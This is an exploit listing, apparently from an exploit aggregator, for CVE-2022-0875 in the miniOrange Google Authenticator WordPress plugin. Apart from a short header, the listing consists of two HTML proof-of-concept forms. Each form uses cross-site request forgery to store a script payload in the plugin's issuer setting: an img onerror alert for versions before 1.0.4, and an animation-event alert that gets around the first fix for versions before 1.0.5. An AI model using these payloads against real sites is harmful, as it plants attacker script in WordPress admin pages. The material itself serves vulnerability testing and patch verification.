Exploit for miniOrange Google Authenticator < 1.0.5 - CSRF to Stored Cross-Site Scripting CVE-2022-0875

Name: Exploit for miniOrange Google Authenticator < 1.0.5 - CSRF to Stored Cross-Site Scripting CVE-2022-0875
Rating: 5 (70 reviews)

2022-06-06 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:FEFC1411-594D-465B-AEB9-78C141B23762
v < 1.0.4

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=mo_view_page" method="POST">
      <input type="hidden" name="option" value="mo2f_gauth_appname" />
      <input type="hidden" name="mo2f_gauth_issuer" value='"><img src onerror=alert(/XSS/)>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

v < 1.0.5
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=mo_view_page" method="POST">
      <input type="hidden" name="option" value="mo2f_gauth_appname" />
      <input type="hidden" name="mo2f_gauth_issuer" value='" style=animation-name:rotation onanimationstart=alert(/XSS/)//' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>